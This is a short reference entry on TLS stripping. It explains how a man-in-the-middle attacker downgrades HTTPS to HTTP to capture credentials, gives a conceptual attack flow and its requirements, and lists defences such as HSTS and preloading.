TLS Stripping

TLS Stripping (also called SSL Stripping) is a man-in-the-middle attack that downgrades HTTPS connections to HTTP, allowing attackers to intercept and read encrypted traffic in plaintext.

How It Works

When a victim attempts to connect to a website, the attacker intercepts the connection and establishes an HTTPS connection to the legitimate server while serving HTTP to the victim. The victim sees an unencrypted connection, but the traffic appears to work normally.

Attack Flow

1. Victim types "bank.com" in browser
   - Browser requests: http://bank.com

2. Attacker intercepts request
   - Attacker connects to: https://bank.com (HTTPS)
   - Server responds with HTTPS content

3. Attacker serves content to victim
   - Attacker serves: http://bank.com (HTTP)
   - Rewrites all https:// links to http://

4. Victim submits credentials over HTTP
   - Attacker captures plaintext credentials
   - Forwards to legitimate server over HTTPS

Attack Requirements

• Man-in-the-middle position (same network)
• Initial request not forced to HTTPS
• No HSTS in browser for target domain

Prevention

• HSTS: Force HTTPS for domain and subdomains
• HSTS Preload: Include domain in browser preload list
• Redirect HTTP to HTTPS on server
• Use HTTPS everywhere

See Also

• Man-in-the-Middle
• Certificate Pinning Bypass
• Session Hijacking